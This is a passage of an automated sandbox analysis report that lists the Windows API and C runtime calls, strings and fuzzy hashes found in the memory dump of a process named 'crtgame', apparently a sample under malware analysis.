                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C224FC
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C2250E
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2256D
                                                                              • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02C2257F
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02C22599
                                                                              • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C225A2
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C225F0
                                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 02C2262F
                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C2268E
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C22699
                                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C226AD
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02C226BD
                                                                              • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C226C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                              • String ID:
                                                                              • API String ID: 1213838671-0
                                                                              • Opcode ID: 9dfb44275c66983ee875c3da46cd1f6ef3a78cfd733facd5a9a93e72b880f8ff
                                                                              • Instruction ID: 03326c1539c4d90bcf1f9151b5a1f507b3248c1096bc33526fda609ec219bb4f
                                                                              • Opcode Fuzzy Hash: 9dfb44275c66983ee875c3da46cd1f6ef3a78cfd733facd5a9a93e72b880f8ff
                                                                              • Instruction Fuzzy Hash: 77614375901219DFCB21DFA5D584AAEFBF9FF48310F104929E906E3240DB34AA58CFA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24533
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                              • htons.WS2_32(?), ref: 02C24594
                                                                              • htonl.WS2_32(?), ref: 02C245B7
                                                                              • htonl.WS2_32(00000000), ref: 02C245BE
                                                                              • htons.WS2_32(00000000), ref: 02C24672
                                                                              • _sprintf.LIBCMT ref: 02C24688
                                                                              • htons.WS2_32(?), ref: 02C245DB
                                                                                • Part of subcall function 02C290C0: __EH_prolog.LIBCMT ref: 02C290C5
                                                                                • Part of subcall function 02C290C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C29140
                                                                                • Part of subcall function 02C290C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C2915E
                                                                                • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                • Part of subcall function 02C2D87F: __EH_prolog.LIBCMT ref: 02C2D884
                                                                              • htonl.WS2_32(?), ref: 02C248A7
                                                                              • htonl.WS2_32(00000000), ref: 02C248AE
                                                                              • htonl.WS2_32(00000000), ref: 02C248F3
                                                                              • htonl.WS2_32(00000000), ref: 02C248FA
                                                                              • htons.WS2_32(?), ref: 02C2491A
                                                                              • htons.WS2_32(?), ref: 02C24924
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                              • String ID:
                                                                              • API String ID: 725951905-0
                                                                              • Opcode ID: c9c8039567aa57d56215091568bcf1e9b505a04216e10366f5e907051d7ae876
                                                                              • Instruction ID: 560bdf3fe86473e2e5e196bdec55b889a1d57f16ee104bdd6eaa76ac9b567829
                                                                              • Opcode Fuzzy Hash: c9c8039567aa57d56215091568bcf1e9b505a04216e10366f5e907051d7ae876
                                                                              • Instruction Fuzzy Hash: 04022972D00269EFDF25DFA4C844BEEBBB9AF09304F10455AE505B7280DBB45A48DFA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23428
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C2346B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C23472
                                                                              • GetLastError.KERNEL32 ref: 02C23486
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C234D7
                                                                              • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C234ED
                                                                              • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C23518
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                              • String ID: CancelIoEx$KERNEL32
                                                                              • API String ID: 2902213904-434325024
                                                                              • Opcode ID: a9c96316a6dd9f90169de24696f608d92e341472ec7a74553106309a977b4f50
                                                                              • Instruction ID: 209f3e42e51a6b882c983a82ab0cee59caca93ce8687d63bfafffdc63f316c3d
                                                                              • Opcode Fuzzy Hash: a9c96316a6dd9f90169de24696f608d92e341472ec7a74553106309a977b4f50
                                                                              • Instruction Fuzzy Hash: BC318FB6900355DFDB12DF65C84476ABBF9FF88311F0049AAE8059B241DB74D905CFA1
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310B0
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C310C5
                                                                              • ResetEvent.KERNEL32(00000000), ref: 02C310CF
                                                                              • CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C31104
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,A5B40990), ref: 02C3117A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C3118F
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                                              • String ID:
                                                                              • API String ID: 1285874450-0
                                                                              • Opcode ID: f84737abf8bb206b895aed7bdde23dfec6a65570b7c4b7f79babe6bc79a2fc7c
                                                                              • Instruction ID: 3258b893aea91f04be75ad847376a6a6c290c8b2906d94e1545dfef76980a3ef
                                                                              • Opcode Fuzzy Hash: f84737abf8bb206b895aed7bdde23dfec6a65570b7c4b7f79babe6bc79a2fc7c
                                                                              • Instruction Fuzzy Hash: D6414E70D04358AFDF21CFA5CC44BAEBBB8AF45724F184A19E819EB280D7709A05CB91
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C220AC
                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C220CD
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C220D8
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C2213E
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C2217A
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C22187
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                              • String ID:
                                                                              • API String ID: 1171374749-0
                                                                              • Opcode ID: 8523b88235d5f523848315c77a361055c0d08a25ed489781b6588a30e1ddcc08
                                                                              • Instruction ID: ffaa1b95e342b08945af33b15aa5922fd572b317779c74d32562523fee107f6d
                                                                              • Opcode Fuzzy Hash: 8523b88235d5f523848315c77a361055c0d08a25ed489781b6588a30e1ddcc08
                                                                              • Instruction Fuzzy Hash: 0B4126755047119FC321DF25D884A6BBBF9FFD8654F004A1EF89A82650DB30EA09CFA2
                                                                              APIs
                                                                                • Part of subcall function 02C318D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C3112E,?,?), ref: 02C318FF
                                                                                • Part of subcall function 02C318D0: CloseHandle.KERNEL32(00000000,?,?,02C3112E,?,?), ref: 02C31914
                                                                                • Part of subcall function 02C318D0: SetEvent.KERNEL32(00000000,02C3112E,?,?), ref: 02C31927
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310B0
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C310C5
                                                                              • ResetEvent.KERNEL32(00000000), ref: 02C310CF
                                                                              • CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C31104
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C31135
                                                                                • Part of subcall function 02C33F5A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C3359C,?,02C50F6C,00000000,00000001), ref: 02C33FAF
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,A5B40990), ref: 02C3117A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C3118F
                                                                                • Part of subcall function 02C31610: GetCurrentProcessId.KERNEL32(?), ref: 02C31669
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,A5B40990), ref: 02C3119F
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2227236058-0
                                                                              • Opcode ID: df082c444ac8823b91b51b58c1e587dee26a3e5297409ff8f1247d7fbf3f61a5
                                                                              • Instruction ID: 499d365f9d99c254b8ad74a14ae511fbc8a0283d36f48b3acd634d02cb3b8fb6
                                                                              • Opcode Fuzzy Hash: df082c444ac8823b91b51b58c1e587dee26a3e5297409ff8f1247d7fbf3f61a5
                                                                              • Instruction Fuzzy Hash: 17317371D003489FDF22DBE4DC44BADB7B9AF45724F180A29E81DEB280D7B19A05CB91
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 02C35794
                                                                                • Part of subcall function 02C37F02: RtlEncodePointer.NTDLL(00000000), ref: 02C37F05
                                                                                • Part of subcall function 02C37F02: __initp_misc_winsig.LIBCMT ref: 02C37F20
                                                                                • Part of subcall function 02C37F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C38C81
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C38C95
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C38CA8
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C38CBB
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C38CCE
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C38CE1
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C38CF4
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C38D07
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C38D1A
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C38D2D
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C38D40
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C38D53
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C38D66
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C38D79
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C38D8C
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C38D9F
                                                                              • __mtinitlocks.LIBCMT ref: 02C35799
                                                                              • __mtterm.LIBCMT ref: 02C357A2
                                                                                • Part of subcall function 02C3580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C3833A
                                                                                • Part of subcall function 02C3580A: RtlDeleteCriticalSection.NTDLL(02C53978), ref: 02C38363
                                                                              • __calloc_crt.LIBCMT ref: 02C357C7
                                                                              • __initptd.LIBCMT ref: 02C357E9
                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C357F0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                              • String ID:
                                                                              • API String ID: 1500305132-0
                                                                              • Opcode ID: acd106006787bbbac414f0ff036ab3cd70455109da0fc09202083baf0d25d4e4
                                                                              • Instruction ID: 3384fba714a1dda5f0d608a1ac8f99e045a1009b6f135e57b64fa93f85564ef7
                                                                              • Opcode Fuzzy Hash: acd106006787bbbac414f0ff036ab3cd70455109da0fc09202083baf0d25d4e4
                                                                              • Instruction Fuzzy Hash: 14F0F0326983A26EE6373A747C056CA2686AF057B4BA00F29F410D61C4FF11D0412961
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C32E73,00000000), ref: 02C32EDB
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C32EE2
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02C32EEE
                                                                              • RtlDecodePointer.NTDLL(00000001), ref: 02C32F0B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 3489934621-340411864
                                                                              • Opcode ID: 6589038d68f424bc6f07b0ebd5bfd4e721a77ae61b45d37586d7da1f19141e5c
                                                                              • Instruction ID: dffbf69302351543bd2665672396d410ab3c3e0ed709b944e88d316cef2a9b9f
                                                                              • Opcode Fuzzy Hash: 6589038d68f424bc6f07b0ebd5bfd4e721a77ae61b45d37586d7da1f19141e5c
                                                                              • Instruction Fuzzy Hash: A8E01274DD0350ABFF105F70EC09B46779DAB94702FA04F24F405E1081DBB585A89F54
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C32EB0), ref: 02C32FB0
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C32FB7
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02C32FC2
                                                                              • RtlDecodePointer.NTDLL(02C32EB0), ref: 02C32FDD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              • Opcode ID: 7111cdbbb8e9e5f6e52a91f4054f691c797dc70cc3e2e8aea8de07a12caebbdd
                                                                              • Instruction ID: c3aa368cdfe202144dd39b1ed3769b6ae4be54651db317f67a12eefe13f36ef2
                                                                              • Opcode Fuzzy Hash: 7111cdbbb8e9e5f6e52a91f4054f691c797dc70cc3e2e8aea8de07a12caebbdd
                                                                              • Instruction Fuzzy Hash: 05E04674DC0310ABFB401F60AD0CB223AACBB88701FA04F24F502E1084DBB880A8CB88
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(00000025,A5B40990,?,?,?,?,00000000,02C464B8,000000FF,02C31BCA), ref: 02C3196A
                                                                              • TlsSetValue.KERNEL32(00000025,02C31BCA,?,?,00000000), ref: 02C319D7
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C31A01
                                                                              • HeapFree.KERNEL32(00000000), ref: 02C31A04
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapValue$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 1812714009-0
                                                                              • Opcode ID: 541f5395d8dec91d5c3fd642702b7e77ff226d2e062106f75359d7ff5fd5c2fc
                                                                              • Instruction ID: 3b928183aec0dd318db4dadfd01945dfac2c5413b55f247d9a68a43a4bf3e4c9
                                                                              • Opcode Fuzzy Hash: 541f5395d8dec91d5c3fd642702b7e77ff226d2e062106f75359d7ff5fd5c2fc
                                                                              • Instruction Fuzzy Hash: 9A51AD359443449FD722DF29C444B16BBE4AB857A5F098A58E85D97380D7B0EA04CBA1
                                                                              APIs
                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 02C45190
                                                                              • __FindPESection.LIBCMT ref: 02C451AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                              • String ID:
                                                                              • API String ID: 876702719-0
                                                                              • Opcode ID: 076b3b6d8b8d1331e1c616cfd14fb17f27fbd5847ae6f578b26cc64949fbe31c
                                                                              • Instruction ID: 885b199dbf71d151fb56a13adc7dbaa64aed464c231621f53cb8b3a3e09f5382
                                                                              • Opcode Fuzzy Hash: 076b3b6d8b8d1331e1c616cfd14fb17f27fbd5847ae6f578b26cc64949fbe31c
                                                                              • Instruction Fuzzy Hash: 7CA1B271E007158FCB25CF58D8807AEB7B5FB94398F944A69DC05A7390EB31E985CB90
                                                                              APIs
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C21CB1
                                                                              • CloseHandle.KERNEL32(?), ref: 02C21CBA
                                                                              • InterlockedExchangeAdd.KERNEL32(02C574EC,00000000), ref: 02C21CC6
                                                                              • TerminateThread.KERNEL32(?,00000000), ref: 02C21CD4
                                                                              • QueueUserAPC.KERNEL32(02C21E7C,?,00000000), ref: 02C21CE1
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C21CEC
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                              • String ID:
                                                                              • API String ID: 1946104331-0
                                                                              • Opcode ID: e890f3f3ac1e3ac5f0d9ae4c881ca3189c662f747f9b5e3f5a687d2dd79ba7d1
                                                                              • Instruction ID: c3caa9ba97f1569ec745306a5e7668e6a2bf451934f95152d73001ecc4925efa
                                                                              • Opcode Fuzzy Hash: e890f3f3ac1e3ac5f0d9ae4c881ca3189c662f747f9b5e3f5a687d2dd79ba7d1
                                                                              • Instruction Fuzzy Hash: C3F0A439941224BFDB204B96DD0DD57FFFCEB85720700475AF92A82190DBB0A918CBA0
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 02C3137F
                                                                                • Part of subcall function 02C31ED3: std::exception::_Copy_str.LIBCMT ref: 02C31EEC
                                                                                • Part of subcall function 02C30750: __CxxThrowException@8.LIBCMT ref: 02C307AE
                                                                              • std::exception::exception.LIBCMT ref: 02C313DE
                                                                              Strings
                                                                              • $, xrefs: 02C313E3
                                                                              • boost unique_lock owns already the mutex, xrefs: 02C313CD
                                                                              • boost unique_lock has no mutex, xrefs: 02C3136E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                              • API String ID: 2140441600-46888669
                                                                              • Opcode ID: a91db20b86bb4b19b2544f5b670546158bf5e611f727ce6acaac4d6dc5c1b8d6
                                                                              • Instruction ID: 8c219c0dd555666b8491c5a8311cc894133630aaab7d26b4a4b650c5d9717e94
                                                                              • Opcode Fuzzy Hash: a91db20b86bb4b19b2544f5b670546158bf5e611f727ce6acaac4d6dc5c1b8d6
                                                                              • Instruction Fuzzy Hash: F72124B25087809FD721DF24C54474BBBE9AF89B08F404E5DF4A587280DBB5D808CF82
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                              • GetLastError.KERNEL32 ref: 02C2237A
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID: pqcs
                                                                              • API String ID: 1619523792-2559862021
                                                                              • Opcode ID: 966f8eda82e61e6b4e2cca8821a620586143b747801156e0f1e150437ef73e19
                                                                              • Instruction ID: 53a5b0e69fd2c43413c98185e24b1875fa2c53374c5b46981542fe796d7feb5b
                                                                              • Opcode Fuzzy Hash: 966f8eda82e61e6b4e2cca8821a620586143b747801156e0f1e150437ef73e19
                                                                              • Instruction Fuzzy Hash: 6DF05B75A413146FD720AF749909B6B77ECDB41601F400A55F90DD2140FB71E6189BD1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24035
                                                                              • GetProcessHeap.KERNEL32(00000000,02C2A5C3,?,?,?,?,?,02C2A5C3), ref: 02C24042
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C24049
                                                                              • std::exception::exception.LIBCMT ref: 02C24063
                                                                                • Part of subcall function 02C2A053: __EH_prolog.LIBCMT ref: 02C2A058
                                                                                • Part of subcall function 02C2A053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A067
                                                                                • Part of subcall function 02C2A053: __CxxThrowException@8.LIBCMT ref: 02C2A086
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3112922283-2104205924
                                                                              • Opcode ID: b825a51147c6e3dc5ba9ea11c31792ef791dcb828c2ce2810b428cfe3616c47f
                                                                              • Instruction ID: a633d8b7b3bf1e9313431070f087905b973801d98134eb360af95e6ef2324c7e
                                                                              • Opcode Fuzzy Hash: b825a51147c6e3dc5ba9ea11c31792ef791dcb828c2ce2810b428cfe3616c47f
                                                                              • Instruction Fuzzy Hash: 92F082B1E442099FDB10EFE0D808BEFB778FB04301F004555E915A2240DF7552188FD1
                                                                              APIs
                                                                                • Part of subcall function 02C31450: CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C314A1
                                                                                • Part of subcall function 02C31450: WaitForSingleObject.KERNEL32(?,000000FF,A5B40990,?,?,?,?,A5B40990,02C31423,A5B40990), ref: 02C314B8
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3171E
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3173E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C31777
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C317CB
                                                                              • SetEvent.KERNEL32(?), ref: 02C317D2
                                                                                • Part of subcall function 02C2418C: CloseHandle.KERNEL32(00000000,?,02C31705), ref: 02C241B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 4166353394-0
                                                                              • Opcode ID: 687f2a3ee84387ebc2d80e437d40d4b30a66e10f4f72196d0767905f09ad1492
                                                                              • Instruction ID: e0301c784dc188ee809228e3ec7dc43fc3b084e6e424832d973ff96d0b06e229
                                                                              • Opcode Fuzzy Hash: 687f2a3ee84387ebc2d80e437d40d4b30a66e10f4f72196d0767905f09ad1492
                                                                              • Instruction Fuzzy Hash: E041E1716003158FDB269F29CC80B27B7E8EF86724F1C0A68EC1CDB295D774D9058B95
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2DA89
                                                                                • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB08
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C2DB24
                                                                              • InterlockedIncrement.KERNEL32(02C55170), ref: 02C2DB49
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2DB5E
                                                                                • Part of subcall function 02C227F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C2284E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                              • String ID:
                                                                              • API String ID: 1578506061-0
                                                                              • Opcode ID: 01b1e1a49803d93dc878cd084e92a14ab5f9b5764c2cf69b609b64a2d6d24cc8
                                                                              • Instruction ID: 378c516ed60d45307a2ef259b2c2cc90027ec45e612958570e2d6c78bb60e6d7
